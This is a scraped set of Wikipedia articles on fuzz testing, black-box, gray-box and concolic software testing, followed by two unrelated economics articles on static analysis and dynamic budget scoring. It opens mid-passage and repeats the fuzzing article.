subtrees from one node to another. If the input can be modelled by aformal grammar, a smart generation-based fuzzer[31]would instantiate theproduction rulesto generate inputs that are valid with respect to the grammar. However, generally the input model must be explicitly provided, which is difficult to do when the model is proprietary, unknown, or very complex. If a large corpus of valid and invalid inputs is available, agrammar inductiontechnique, such asAngluin's L* algorithm, would be able to generate an input model.[35][36] A dumb fuzzer[37][38]does not require the input model and can thus be employed to fuzz a wider variety of programs. For instance,AFLis a dumb mutation-based fuzzer that modifies a seed file byflipping random bits, by substituting random bytes with "interesting" values, and by moving or deleting blocks of data. However, a dumb fuzzer might generate a lower proportion of valid inputs and stress theparsercode rather than the main components of a program. The disadvantage of dumb fuzzers can be illustrated by means of the construction of a validchecksumfor acyclic redundancy check(CRC). A CRC is anerror-detecting codethat ensures that theintegrityof the data contained in the input file is preserved duringtransmission. A checksum is computed over the input data and recorded in the file. When the program processes the received file and the recorded checksum does not match the re-computed checksum, then the file is rejected as invalid. Now, a fuzzer that is unaware of the CRC is unlikely to generate the correct checksum. However, there are attempts to identify and re-compute a potential checksum in the mutated input, once a dumb mutation-based fuzzer has modified the protected data.[39] Typically, a fuzzer is considered more effective if it achieves a higher degree ofcode coverage. The rationale is, if a fuzzer does not exercise certain structural elements in the program, then it is also not able to revealbugsthat are hiding in these elements. Some program elements are considered more critical than others. For instance, a division operator might cause adivision by zeroerror, or asystem callmay crash the program. Ablack-boxfuzzer[37][33]treats the program as ablack boxand is unaware of internal program structure. For instance, arandom testingtool that generates inputs at random is considered a blackbox fuzzer. Hence, a blackbox fuzzer can execute several hundred inputs per second, can be easily parallelized, and can scale to programs of arbitrary size. However, blackbox fuzzers may only scratch the surface and expose "shallow" bugs. Hence, there are attempts to develop blackbox fuzzers that can incrementally learn about the internal structure (and behavior) of a program during fuzzing by observing the program's output given an input. For instance, LearnLib employsactive learningto generate anautomatonthat represents the behavior of a web application. Awhite-boxfuzzer[38][32]leveragesprogram analysisto systematically increasecode coverageor to reach certain critical program locations. For instance, SAGE[40]leveragessymbolic executionto systematically explore different paths in the program (a technique known asconcolic execution). If theprogram's specificationis available, a whitebox fuzzer might leverage techniques frommodel-based testingto generate inputs and check the program outputs against the program specification. A whitebox fuzzer can be very effective at exposing bugs that hide deep in the program. However, the time used for analysis (of the program or its specification) can become prohibitive. If the whitebox fuzzer takes relatively too long to generate an input, a blackbox fuzzer will be more efficient.[41]Hence, there are attempts to combine the efficiency of blackbox fuzzers and the effectiveness of whitebox fuzzers.[42] Agray-boxfuzzer leveragesinstrumentationrather than program analysis to glean information about the program. For instance, AFL and libFuzzer utilize lightweight instrumentation to tracebasic blocktransitions exercised by an input. This leads to a reasonable performance overhead but informs the fuzzer about the increase in code coverage during fuzzing, which makes gray-box fuzzers extremely efficient vulnerability detection tools.[43] Fuzzing is used mostly as an automated technique to exposevulnerabilitiesin security-critical programs that might beexploitedwith malicious intent.[6][16][17]More generally, fuzzing is used to demonstrate the presence of bugs rather than their absence. Running a fuzzing campaign for several weeks without finding a bug does not prove the program correct.[44]After all, the program may still fail for an input that has not been executed, yet; executing a program for all inputs is prohibitively expensive. If the objective is to prove a program correct for all inputs, aformal specificationmust exist and techniques fromformal methodsmust be used. In order to expose bugs, a fuzzer must be able to distinguish expected (normal) from unexpected (buggy) program behavior. However, a machine cannot always distinguish a bug from a feature. In automatedsoftware testing, this is also called thetest oracleproblem.[45][46] Typically, a fuzzer distinguishes between crashing and non-crashing inputs in the absence ofspecificationsand to use a simple and objective measure.Crashescan be easily identified and might indicate potential vulnerabilities (e.g.,denial of serviceorarbitrary code execution). However, the absence of a crash does not indicate the absence of a vulnerability. For instance, a program written inCmay or may not crash when an input causes abuffer overflow. Rather the program's behavior isundefined. To make a fuzzer more sensitive to failures other than crashes, sanitizers can be used to inject assertions that crash the program when a failure is detected.[47][48]There are different sanitizers for different kinds of bugs: Fuzzing can also be used to detect "differential" bugs if areference implementationis available. For automatedregression testing,[49]the generated inputs are executed on twoversionsof the same program. For automateddifferential testing,[50]the generated inputs are executed on two implementations of the same program (e.g.,lighttpdandhttpdare both implementations of a web server). If the two variants produce different output for the same input, then one may be buggy and should be examined more closely. Static program analysisanalyzes a program without actually executing it. This might lead tofalse positiveswhere the tool reports problems with the program that do not actually exist. Fuzzing in combination withdynamic program analysiscan be used to try to generate an input that actually witnesses the reported problem.[51] Modern web browsers undergo extensive fuzzing. TheChromiumcode ofGoogle Chromeis continuously fuzzed by the Chrome Security Team with 15,000 cores.[52]ForMicrosoft Edge [Legacy]andInternet Explorer,Microsoftperformed fuzzed testing with 670 machine-years during product development, generating more than 400 billionDOMmanipulations from 1 billion HTML files.[53][52] A fuzzer produces a large number of inputs in a relatively short time. For instance, in 2016 the Google OSS-fuzz project produced around 4trillioninputs a week.[17]Hence, many fuzzers provide atoolchainthat automates otherwise manual and tedious tasks which follow the automated generation of failure-inducing inputs. Automated bug triage is used to group a large number of failure-inducing inputs byroot causeand to prioritize each individual bug by severity. A fuzzer produces a large number of inputs, and many of the failure-inducing ones may effectively expose the samesoftware bug. Only some of these bugs aresecurity-criticaland should bepatchedwith higher priority. For instance theCERT Coordination Centerprovides the Linux triage tools which group crashing inputs by the producedstack traceand lists each group according to their probability to beexploitable.[54]The Microsoft Security Research Centre (MSEC) developed the "!exploitable" tool which first creates ahashfor a crashing input to determine its uniqueness and then assigns an exploitability rating:[55] Previously unreported, triaged bugs might be automaticallyreportedto abug tracking system. For instance, OSS-Fuzz runs large-scale, long-running fuzzing campaigns for several security-critical software projects where each previously unreported, distinct bug is reported directly to a bug tracker.[17]The OSS-Fuzz bug tracker automatically informs themaintainerof the vulnerable software and checks in regular intervals whether the bug has been fixed in the most recentrevisionusing the uploaded minimized failure-inducing input. Automated input minimization (or test case reduction) is an automateddebuggingtechnique to isolate that part of the failure-inducing input that is actually inducing the failure.[56][57]If the failure-inducing input is large and mostly malformed, it might be difficult for a developer to understand what exactly is causing the bug. Given the failure-inducing input, an automated minimization tool would remove as many input bytes as possible while still reproducing the original bug. For instance,Delta Debuggingis an automated input minimization technique that employs an extendedbinary search algorithmto find such a minimal input.[58] The following is a list of fuzzers described as "popular", "widely used", or similar in the academic literature.[59][60]
https://en.wikipedia.org/wiki/Fuzz_testing
Inprogrammingandsoftware development,fuzzingorfuzz testingis an automatedsoftware testingtechnique that involves providing invalid, unexpected, orrandom dataas inputs to acomputer program. The program is then monitored for exceptions such ascrashes, failing built-in codeassertions, or potentialmemory leaks. Typically, fuzzers are used to test programs that take structured inputs. This structure is specified, such as in afile formatorprotocoland distinguishes valid from invalid input. An effective fuzzer generates semi-valid inputs that are "valid enough" in that they are not directly rejected by the parser, but do create unexpected behaviors deeper in the program and are "invalid enough" to exposecorner casesthat have not been properly dealt with. For the purpose of security, input that crosses atrust boundaryis often the most useful.[1]For example, it is more important to fuzz code that handles a file uploaded by any user than it is to fuzz the code that parses a configuration file that is accessible only to a privileged user. The term "fuzz" originates from a 1988 class project[2]in the graduate Advanced Operating Systems class (CS736), taught by Prof. Barton Miller at theUniversity of Wisconsin, whose results were subsequently published in 1990.[3][4]To fuzz test aUNIXutility meant to automatically generate random input and command-line parameters for the utility. The project was designed to test the reliability of UNIX command line programs by executing a large number of random inputs in quick succession until they crashed. Miller's team was able to crash 25 to 33 percent of the utilities that they tested. They then debugged each of the crashes to determine the cause and categorized each detected failure. To allow other researchers to conduct similar experiments with other software, the source code of the tools, the test procedures, and the raw result data were made publicly available.[5]This early fuzzing would now be called black box, generational, unstructured (dumb or "classic") fuzzing. According to Prof. Barton Miller, "In the process of writing the project description, I needed to give this kind of testing a name. I wanted a name that would evoke the feeling of random, unstructured data. After trying out several ideas, I settled on the term fuzz."[4] A key contribution of this early work was simple (almost simplistic) oracle. A program failed its test if it crashed or hung under the random input and was considered to have passed otherwise. While test oracles can be challenging to construct, the oracle for this early fuzz testing was simple and universal to apply. In April 2012, Google announced ClusterFuzz, a cloud-based fuzzing infrastructure for security-critical components of theChromium web browser.[6]Security researchers can upload their own fuzzers and collect bug bounties if ClusterFuzz finds a crash with the uploaded fuzzer. In September 2014,Shellshock[7]was disclosed as a family ofsecurity bugsin the widely usedUNIXBashshell; most vulnerabilities of Shellshock were found using the fuzzerAFL.[8](Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash toexecute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.[9]) In April 2015, Hanno Böck showed how the fuzzer AFL could have found the 2014 Heartbleed vulnerability.[10][11](TheHeartbleedvulnerability was disclosed in April 2014. It is a serious vulnerability that allows adversaries to decipher otherwiseencrypted communication. The vulnerability was accidentally introduced intoOpenSSLwhich implementsTLSand is used by the majority of the servers on the internet.Shodanreported 238,000 machines still vulnerable in April 2016;[12]200,000 in January 2017.[13]) In August 2016, theDefense Advanced Research Projects Agency(DARPA) held the finals of the firstCyber Grand Challenge, a fully automatedcapture-the-flagcompetition that lasted 11 hours.[14]The objective was to develop automatic defense systems that can discover,exploit, andcorrectsoftware flaws inreal-time. Fuzzing was used as an effective offense strategy to discover flaws in the software of the opponents. It showed tremendous potential in the automation of vulnerability detection. The winner was a system called "Mayhem"[15]developed by the team ForAllSecure led byDavid Brumley. In September 2016, Microsoft announced Project Springfield, a cloud-based fuzz testing service for finding security critical bugs in software.[16] In December 2016, Google announced OSS-Fuzz which allows for continuous fuzzing of several security-critical open-source projects.[17] At Black Hat 2018, Christopher Domas demonstrated the use of fuzzing to expose the existence of a hiddenRISCcore in a processor.[18]This core was able to bypass existing security checks to executeRing 0commands from Ring 3. In September 2020,MicrosoftreleasedOneFuzz, aself-hostedfuzzing-as-a-service platform that automates the detection ofsoftware bugs.[19]It supportsWindowsand Linux.[20]It has been archived three years later on November 1st, 2023.[21] Testing programs with random inputs dates back to the 1950s when data was still stored onpunched cards.[22]Programmers would use punched cards that were pulled from the trash or card decks of random numbers as input to computer programs. If an execution revealed undesired behavior, abughad been detected. The execution of random inputs is also calledrandom testingormonkey testing. In 1981, Duran and Ntafos formally investigated the effectiveness of testing a program with random inputs.[23][24]While random testing had been widely perceived to be the worst means of testing a program, the authors could show that it is a cost-effective alternative to more systematic testing techniques. In 1983,Steve Cappsat Apple developed "The Monkey",[25]a tool that would generate random inputs forclassic Mac OSapplications, such asMacPaint.[26]The figurative "monkey" refers to theinfinite monkey theoremwhich states that a monkey hitting keys at random on a typewriter keyboard for an infinite amount of time will eventually type out the entire works of Shakespeare. In the case of testing, the monkey would write the particular sequence of inputs that would trigger a crash. In 1991, the crashme tool was released, which was intended to test the robustness of Unix andUnix-likeoperating systemsby randomly executing systems calls with randomly chosen parameters.[27] A fuzzer can be categorized in several ways:[28][1] A mutation-based fuzzer leverages an existing corpus of seed inputs during fuzzing. It generates inputs by modifying (or rathermutating) the provided seeds.[29]For example, when fuzzing the image librarylibpng, the user would provide a set of validPNGimage files as seeds while a mutation-based fuzzer would modify these seeds to produce semi-valid variants of each seed. The corpus of seed files may contain thousands of potentially similar inputs. Automated seed selection (or test suite reduction) allows users to pick the best seeds in order to maximize the total number of bugs found during a fuzz campaign.[30] A generation-based fuzzer generates inputs from scratch. For instance, a smart generation-based fuzzer[31]takes the input model that was provided by the user to generate new inputs. Unlike mutation-based fuzzers, a generation-based fuzzer does not depend on the existence or quality of a corpus of seed inputs. Some fuzzers have the capability to do both, to generate inputs from scratch and to generate inputs by mutation of existing seeds.[32] Typically, fuzzers are used to generate inputs for programs that take structured inputs, such as afile, a sequence of keyboard or mouseevents, or a sequence ofmessages. This structure distinguishes valid input that is accepted and processed by the program from invalid input that is quickly rejected by the program. What constitutes a valid input may be explicitly specified in an input model. Examples of input models areformal grammars,file formats,GUI-models, andnetwork protocols. Even items not normally considered as input can be fuzzed, such as the contents ofdatabases,shared memory,environment variablesor the precise interleaving ofthreads. An effective fuzzer generates semi-valid inputs that are "valid enough" so that they are not directly rejected from theparserand "invalid enough" so that they might stresscorner casesand exercise interesting program behaviours. A smart (model-based,[32]grammar-based,[31][33]or protocol-based[34]) fuzzer leverages the input model to generate a greater proportion of valid inputs. For instance, if the input can be modelled as anabstract syntax tree, then a smart mutation-based fuzzer[33]would employ randomtransformationsto move complete subtrees from one node to another. If the input can be modelled by aformal grammar, a smart generation-based fuzzer[31]would instantiate theproduction rulesto generate inputs that are valid with respect to the grammar. However, generally the input model must be explicitly provided, which is difficult to do when the model is proprietary, unknown, or very complex. If a large corpus of valid and invalid inputs is available, agrammar inductiontechnique, such asAngluin's L* algorithm, would be able to generate an input model.[35][36] A dumb fuzzer[37][38]does not require the input model and can thus be employed to fuzz a wider variety of programs. For instance,AFLis a dumb mutation-based fuzzer that modifies a seed file byflipping random bits, by substituting random bytes with "interesting" values, and by moving or deleting blocks of data. However, a dumb fuzzer might generate a lower proportion of valid inputs and stress theparsercode rather than the main components of a program. The disadvantage of dumb fuzzers can be illustrated by means of the construction of a validchecksumfor acyclic redundancy check(CRC). A CRC is anerror-detecting codethat ensures that theintegrityof the data contained in the input file is preserved duringtransmission. A checksum is computed over the input data and recorded in the file. When the program processes the received file and the recorded checksum does not match the re-computed checksum, then the file is rejected as invalid. Now, a fuzzer that is unaware of the CRC is unlikely to generate the correct checksum. However, there are attempts to identify and re-compute a potential checksum in the mutated input, once a dumb mutation-based fuzzer has modified the protected data.[39] Typically, a fuzzer is considered more effective if it achieves a higher degree ofcode coverage. The rationale is, if a fuzzer does not exercise certain structural elements in the program, then it is also not able to revealbugsthat are hiding in these elements. Some program elements are considered more critical than others. For instance, a division operator might cause adivision by zeroerror, or asystem callmay crash the program. Ablack-boxfuzzer[37][33]treats the program as ablack boxand is unaware of internal program structure. For instance, arandom testingtool that generates inputs at random is considered a blackbox fuzzer. Hence, a blackbox fuzzer can execute several hundred inputs per second, can be easily parallelized, and can scale to programs of arbitrary size. However, blackbox fuzzers may only scratch the surface and expose "shallow" bugs. Hence, there are attempts to develop blackbox fuzzers that can incrementally learn about the internal structure (and behavior) of a program during fuzzing by observing the program's output given an input. For instance, LearnLib employsactive learningto generate anautomatonthat represents the behavior of a web application. Awhite-boxfuzzer[38][32]leveragesprogram analysisto systematically increasecode coverageor to reach certain critical program locations. For instance, SAGE[40]leveragessymbolic executionto systematically explore different paths in the program (a technique known asconcolic execution). If theprogram's specificationis available, a whitebox fuzzer might leverage techniques frommodel-based testingto generate inputs and check the program outputs against the program specification. A whitebox fuzzer can be very effective at exposing bugs that hide deep in the program. However, the time used for analysis (of the program or its specification) can become prohibitive. If the whitebox fuzzer takes relatively too long to generate an input, a blackbox fuzzer will be more efficient.[41]Hence, there are attempts to combine the efficiency of blackbox fuzzers and the effectiveness of whitebox fuzzers.[42] Agray-boxfuzzer leveragesinstrumentationrather than program analysis to glean information about the program. For instance, AFL and libFuzzer utilize lightweight instrumentation to tracebasic blocktransitions exercised by an input. This leads to a reasonable performance overhead but informs the fuzzer about the increase in code coverage during fuzzing, which makes gray-box fuzzers extremely efficient vulnerability detection tools.[43] Fuzzing is used mostly as an automated technique to exposevulnerabilitiesin security-critical programs that might beexploitedwith malicious intent.[6][16][17]More generally, fuzzing is used to demonstrate the presence of bugs rather than their absence. Running a fuzzing campaign for several weeks without finding a bug does not prove the program correct.[44]After all, the program may still fail for an input that has not been executed, yet; executing a program for all inputs is prohibitively expensive. If the objective is to prove a program correct for all inputs, aformal specificationmust exist and techniques fromformal methodsmust be used. In order to expose bugs, a fuzzer must be able to distinguish expected (normal) from unexpected (buggy) program behavior. However, a machine cannot always distinguish a bug from a feature. In automatedsoftware testing, this is also called thetest oracleproblem.[45][46] Typically, a fuzzer distinguishes between crashing and non-crashing inputs in the absence ofspecificationsand to use a simple and objective measure.Crashescan be easily identified and might indicate potential vulnerabilities (e.g.,denial of serviceorarbitrary code execution). However, the absence of a crash does not indicate the absence of a vulnerability. For instance, a program written inCmay or may not crash when an input causes abuffer overflow. Rather the program's behavior isundefined. To make a fuzzer more sensitive to failures other than crashes, sanitizers can be used to inject assertions that crash the program when a failure is detected.[47][48]There are different sanitizers for different kinds of bugs: Fuzzing can also be used to detect "differential" bugs if areference implementationis available. For automatedregression testing,[49]the generated inputs are executed on twoversionsof the same program. For automateddifferential testing,[50]the generated inputs are executed on two implementations of the same program (e.g.,lighttpdandhttpdare both implementations of a web server). If the two variants produce different output for the same input, then one may be buggy and should be examined more closely. Static program analysisanalyzes a program without actually executing it. This might lead tofalse positiveswhere the tool reports problems with the program that do not actually exist. Fuzzing in combination withdynamic program analysiscan be used to try to generate an input that actually witnesses the reported problem.[51] Modern web browsers undergo extensive fuzzing. TheChromiumcode ofGoogle Chromeis continuously fuzzed by the Chrome Security Team with 15,000 cores.[52]ForMicrosoft Edge [Legacy]andInternet Explorer,Microsoftperformed fuzzed testing with 670 machine-years during product development, generating more than 400 billionDOMmanipulations from 1 billion HTML files.[53][52] A fuzzer produces a large number of inputs in a relatively short time. For instance, in 2016 the Google OSS-fuzz project produced around 4trillioninputs a week.[17]Hence, many fuzzers provide atoolchainthat automates otherwise manual and tedious tasks which follow the automated generation of failure-inducing inputs. Automated bug triage is used to group a large number of failure-inducing inputs byroot causeand to prioritize each individual bug by severity. A fuzzer produces a large number of inputs, and many of the failure-inducing ones may effectively expose the samesoftware bug. Only some of these bugs aresecurity-criticaland should bepatchedwith higher priority. For instance theCERT Coordination Centerprovides the Linux triage tools which group crashing inputs by the producedstack traceand lists each group according to their probability to beexploitable.[54]The Microsoft Security Research Centre (MSEC) developed the "!exploitable" tool which first creates ahashfor a crashing input to determine its uniqueness and then assigns an exploitability rating:[55] Previously unreported, triaged bugs might be automaticallyreportedto abug tracking system. For instance, OSS-Fuzz runs large-scale, long-running fuzzing campaigns for several security-critical software projects where each previously unreported, distinct bug is reported directly to a bug tracker.[17]The OSS-Fuzz bug tracker automatically informs themaintainerof the vulnerable software and checks in regular intervals whether the bug has been fixed in the most recentrevisionusing the uploaded minimized failure-inducing input. Automated input minimization (or test case reduction) is an automateddebuggingtechnique to isolate that part of the failure-inducing input that is actually inducing the failure.[56][57]If the failure-inducing input is large and mostly malformed, it might be difficult for a developer to understand what exactly is causing the bug. Given the failure-inducing input, an automated minimization tool would remove as many input bytes as possible while still reproducing the original bug. For instance,Delta Debuggingis an automated input minimization technique that employs an extendedbinary search algorithmto find such a minimal input.[58] The following is a list of fuzzers described as "popular", "widely used", or similar in the academic literature.[59][60]
https://en.wikipedia.org/wiki/Fuzzing
Black-box testing,sometimes referred to asspecification-based testing,[1]is a method ofsoftware testingthat examines the functionality of an application without peering into its internal structures or workings. This method of test can be applied virtually to every level of software testing:unit,integration,systemandacceptance. Black-box testing is also used as a method inpenetration testing, where anethical hackersimulates an external hacking or cyber warfare attack with no knowledge of the system being attacked. Specification-based testing aims to test the functionality of software according to the applicable requirements.[2]This level of testing usually requires thoroughtest casesto be provided to the tester, who then can simply verify that for a given input, the output value (or behavior), either "is" or "is not" the same as the expected value specified in the test case. Specific knowledge of the application's code, internal structure and programming knowledge in general is not required.[3]The tester is aware ofwhatthe software is supposed to do but is not aware ofhowit does it. For instance, the tester is aware that a particular input returns a certain, invariable output but is not aware ofhowthe software produces the output in the first place.[4] Test casesare built around specifications andrequirements, i.e., what the application is supposed to do. Test cases are generally derived from external descriptions of the software, including specifications, requirements and design parameters. Although the tests used are primarilyfunctionalin nature,non-functionaltests may also be used. The test designer selects both valid and invalid inputs and determines the correct output, often with the help of atest oracleor a previous result that is known to be good, without any knowledge of the test object's internal structure. Typical black-box test design techniques includedecision tabletesting,all-pairs testing,equivalence partitioning,boundary value analysis,cause–effect graph,error guessing,state transitiontesting,use casetesting,user storytesting,domain analysis, and syntax testing.[5][6] Test coveragerefers to the percentage ofsoftware requirementsthat are tested by black-box testing for a system or application.[7]This is in contrast withcode coverage, which examines the inner workings of a program and measures the degree to which thesource codeof aprogramis executed when a test suite is run.[8]Measuring test coverage makes it possible to quickly detect and eliminate defects, to create a more comprehensivetest suite. and to remove tests that are not relevant for the given requirements.[8][9] Black-box testing may be necessary to assure correct functionality, but it is insufficient to guard against complex or high-risk situations.[10]An advantage of the black box technique is that no programming knowledge is required. Whatever biases the programmers may have had, the tester likely has a different set and may emphasize different areas of functionality. On the other hand, black-box testing has been said to be "like a walk in a dark labyrinth without a flashlight."[11]Because they do not examine the source code, there are situations when a tester writes many test cases to check something that could have been tested by only one test case or leaves some parts of the program untested.
https://en.wikipedia.org/wiki/Black_box_testing
Gray-box testing(International English spelling:grey-box testing) is a combination ofwhite-box testingandblack-box testing. The aim of this testing is to search for the defects, if any, due to improper structure or improper usage of applications.[1][2] A black-box tester is unaware of the internal structure of the application to be tested, while a white-box tester has access to the internal structure of the application. A gray-box tester partially knows the internal structure, which includes access to the documentation of internal data structures as well as the algorithms used.[3] Gray-box testers require both high-level and detailed documents describing the application, which they collect in order to define test cases.[4] Gray-box testing is beneficial because it takes the straightforward technique of black-box testing and combines it with the code-targeted systems in white-box testing. Gray-box testing is based on requirement test case generation because it presents all the conditions before the program is tested by using the assertion method. A requirementspecification languageis used to make it easy to understand the requirements and verify its correctness.[5] Object-oriented software consists primarily of objects; where objects are single indivisible units having executable code and/or data. Some assumptions are stated below which are needed for the application of use gray-box testing. Cem Kanerdefines "gray-box testing as involving inputs and outputs, but test design is educated by information about the code or the program operation of a kind that would normally be out of view of the tester".[9]Gray-box testing techniques are: The distributed nature ofWeb servicesallows gray-box testing to detect defects within aservice-oriented architecture(SOA). As we know, white-box testing is not suitable for Web services as it deals directly with the internal structures. White-box testing can be used for state art methods; for example, message mutation which generates the automatic tests for large arrays to help exception handling states, flow without source code or binaries. Such a strategy is useful to push gray-box testing nearer to the outcomes of white-box testing.
https://en.wikipedia.org/wiki/Gray_box_testing
Concolic testing(aportmanteauofconcreteandsymbolic, also known asdynamic symbolic execution) is a hybridsoftware verificationtechnique that performssymbolic execution, a classical technique that treats program variables as symbolic variables, along aconcrete execution(testingon particular inputs) path. Symbolic execution is used in conjunction with anautomated theorem proveror constraint solver based onconstraint logic programmingto generate new concrete inputs (test cases) with the aim of maximizingcode coverage. Its main focus is finding bugs in real-world software, rather than demonstrating program correctness. A description and discussion of the concept was introduced in "DART: Directed Automated Random Testing" by Patrice Godefroid, Nils Klarlund, and Koushik Sen.[1]The paper "CUTE: A concolic unit testing engine for C",[2]by Koushik Sen, Darko Marinov, andGul Agha, further extended the idea to data structures, and first coined the termconcolic testing. Another tool, called EGT (renamed to EXE and later improved and renamed to KLEE), based on similar ideas was independently developed by Cristian Cadar andDawson Englerin 2005, and published in 2005 and 2006.[3]PathCrawler[4][5]first proposed to perform symbolic execution along a concrete execution path, but unlike concolic testing PathCrawler does not simplify complex symbolic constraints using concrete values. These tools (DART and CUTE, EXE) applied concolic testing to unit testing ofCprograms and concolic testing was originally conceived as awhite boximprovement upon establishedrandom testingmethodologies. The technique was later generalized to testing multithreadedJavaprograms with jCUTE,[6]and unit testing programs from their executable codes (tool OSMOSE).[7]It was also combined withfuzz testingand extended to detect exploitable security issues in large-scalex86binaries byMicrosoft Research's SAGE.[8][9] The concolic approach is also applicable tomodel checking. In a concolic model checker, the model checker traverses states of the model representing the software being checked, while storing both a concrete state and a symbolic state. The symbolic state is used for checking properties on the software, while the concrete state is used to avoid reaching unreachable states. One such tool is ExpliSAT by Sharon Barner, Cindy Eisner, Ziv Glazberg,Daniel Kroeningand Ishai Rabinovitz[10] Implementation of traditional symbolic execution based testing requires the implementation of a full-fledged symbolic interpreter for a programming language. Concolic testing implementors noticed that implementation of full-fledged symbolic execution can be avoided if symbolic execution can be piggy-backed with the normal execution of a program throughinstrumentation. This idea of simplifying implementation of symbolic execution gave birth to concolic testing. An important reason for the rise of concolic testing (and more generally, symbolic-execution based analysis of programs) in the decade since it was introduced in 2005 is the dramatic improvement in the efficiency and expressive power ofSMT Solvers. The key technical developments that lead to the rapid development of SMT solvers include combination of theories, lazy solving, DPLL(T) and the huge improvements in the speed ofSAT solvers. SMT solvers that are particularly tuned for concolic testing includeZ3, STP, Z3str2, andBoolector. Consider the following simple example, written in C: Simple random testing, trying random values ofxandy, would require an impractically large number of tests to reproduce the failure. We begin with an arbitrary choice forxandy, for examplex=y= 1. In the concrete execution, line 2 setszto 2, and the test in line 3 fails since 1 ≠ 100000. Concurrently, the symbolic execution follows the same path but treatsxandyas symbolic variables. It setszto the expression 2yand notes that, because the test in line 3 failed,x≠ 100000. This inequality is called apath conditionand must be true for all executions following the same execution path as the current one. Since we'd like the program to follow a different execution path on the next run, we take the last path condition encountered,x≠ 100000, and negate it, givingx= 100000. An automated theorem prover is then invoked to find values for the input variablesxandygiven the complete set of symbolic variable values and path conditions constructed during symbolic execution. In this case, a valid response from the theorem prover might bex= 100000,y= 0. Running the program on this input allows it to reach the inner branch on line 4, which is not taken since 100000 (x) is not less than 0 (z= 2y). The path conditions arex= 100000 andx≥z. The latter is negated, givingx<z. The theorem prover then looks forx,ysatisfyingx= 100000,x<z, andz= 2y; for example,x= 100000,y= 50001. This input reaches the error. Essentially, a concolic testing algorithm operates as follows: There are a few complications to the above procedure: Symbolic-execution based analysis and testing, in general, has witnessed a significant level of interest from industry.[citation needed]Perhaps the most famous commercial tool that uses dynamic symbolic execution (aka concolic testing) is the SAGE tool from Microsoft. The KLEE and S2E tools (both of which are open-source tools, and use the STP constraint solver) are widely used in many companies including Micro Focus Fortify, NVIDIA, and IBM.[citation needed]Increasingly these technologies are being used by many security companies and hackers alike to find security vulnerabilities. Concolic testing has a number of limitations: Many tools, notably DART and SAGE, have not been made available to the public at large. Note however that for instance SAGE is "used daily" for internal security testing at Microsoft.[13]
https://en.wikipedia.org/wiki/Concolic_testing
Static analysis,static projection, orstatic scoringis a simplified analysis wherein the effect of an immediate change to a system is calculated without regard to the longer-term response of the system to that change. If the short-term effect is then extrapolated to the long term, such extrapolation is inappropriate. Its opposite,dynamic analysisor dynamic scoring, is an attempt to take into account how the system is likely to respond to the change over time. One common use of these terms isbudget policyin the United States,[1]although it also occurs in many other statistical disputes. A famous example of extrapolation of static analysis comes fromoverpopulationtheory. Starting withThomas Malthusat the end of the 18th century, various commentators have projected some short-term population growth trend for years into the future, resulting in the prediction that there would be disastrous overpopulation within a generation or two. Malthus himself essentially claimed that British society would collapse under the weight of overpopulation by 1850, while during the 1960s the bookThe Population Bombmade similar dire predictions for the US by the 1980s. For economic policy discussions, predictions that assume no significant change of behavior in response to change in incentives are often termed static projection (and in the US Congressional Budget Office, "static scoring").[citation needed] However, when applied to dynamically responsive systems, static analysis improperly extrapolated tends to produce results that are not only incorrect but opposite in direction to what was predicted, as shown in the following applications.[citation needed] Some have criticized the notion of atechnological singularityas an instance of static analysis:accelerating changein some factor of information growth, such asMoore's lawor computer intelligence, is projected into the future, resulting inexponential growthorhyperbolic growth(to a singularity), that suggests that everything will be known by a relatively early date.[citation needed]
https://en.wikipedia.org/wiki/Static_analysis
Dynamic scoringis a forecasting technique forgovernment revenues, expenditures, andbudget deficitsthat incorporates predictions about the behavior of people and organizations based on changes infiscal policy, usuallytax rates. Dynamic scoring depends on models of the behavior ofeconomic agentswhich predict how they would react once the tax rate or other policy change goes into effect. This means the uncertainty induced in predictions is greater to the degree that the proposed policy is unlike current policy. Unfortunately, any such model depends heavily on judgment, and there is no evidence that it is more effective or accurate.[1] For example, a dynamic scoring model may includeeconometric modelof a transitional phase as the population adapts to the new policy, rather than the so-calledstatic-scoring[2]alternative of standard assumption about behavior of people being immediately and directly sensitive to prices. The outcome of the dynamic analysis is therefore heavily dependent on assumptions about future behaviors and rates of change. The dynamic analysis is potentially more accurate than the alternative, if theeconometricmodel correctly captureshowhouseholds and firms will react to a policy changes. This has been attacked as assumption-driven compared to static scoring which makes simpler assumptions about behavior change due to the introduction of a new policy. Using dynamic scoring has been promoted byRepublican legislatorsto argue thatsupply-sidetax policy, for example theBush tax cutsof 2001[3]and 2011 GOPPath to Prosperityproposal,[4]return higher benefits in terms ofGDPgrowth and revenue increases than are predicted from static scoring. Some economists[5]argue that their dynamic scoring conclusions are overstated,[6]pointing out thatCongressional Budget Office(CBO) practices already include some dynamic scoring elements and that to include more may lead to politicization of the department.[7] On January 6, 2013, the version of thePro-Growth Budgeting Act of 2013included in theBudget and Accounting Transparency Act of 2014passed theUnited States House of Representativesas part of their Rules adopted in House Resolution 5, passed with the exclusive support of theRepublican Party (United States)by a vote of 234-172.[8]The same rules package for the year had other controversial provisions funded.[9]The bill would require theCongressional Budget Officeto use dynamic scoring to provide a macroeconomic impact analysis for bills that are estimated to have a large budgetary effect.[10]The text of the provision read: (a) An estimate provided by the Congressional Budget Office under section 402 of the Congressional Budget Act of 1974 for any major legislation shall, to the extent practicable, incorporate the budgetary effects of changes in economic output, employment, capital stock, and other macroeconomic variables resulting from such legislation. (b) An estimate provided by the Joint Committee on Taxation to the Director of the Congressional Budget Office under section 201(f) of the Congressional Budget Act of 1974 for any major legislation shall, to the extent practicable, incorporate the budgetary effects of changes in economic output, employment, capital stock, and other macroeconomic variables resulting from such legislation. (c) An estimate referred to in this clause shall, to the extent practicable, include-- (d) As used in this clause-- These provisions were removed in January 2019 for the 116th Congress by H. Res. 6 section 102(u).[12] TheKansasstate government cut personal income taxes to stimulate economic growth, depending on optimistic assumptions from dynamic scoring for state revenue. Authors of the plan claimed that "cutting taxes can have a near immediate and permanent impact,"[13]arguing for tax cuts over rebuilding roads or improving the quality of schools. In addition, the tax on "pass-through" businesses was eliminated. After continual revenue deficits, the largest sales tax increase in Kansas history, downgrades fromMoody'sandStandard & Poor'sand economic performance that lagged neighboring states, the election of 2016 was a referendum on tax policy and the legislature increased income taxes over the governor's veto[14][15][16]Kansas's "rainy day" fund reported levels $570 million lower than before the tax cut,[17]even thoughKansashad directed more tax revenue to it.
https://en.wikipedia.org/wiki/Dynamic_analysis
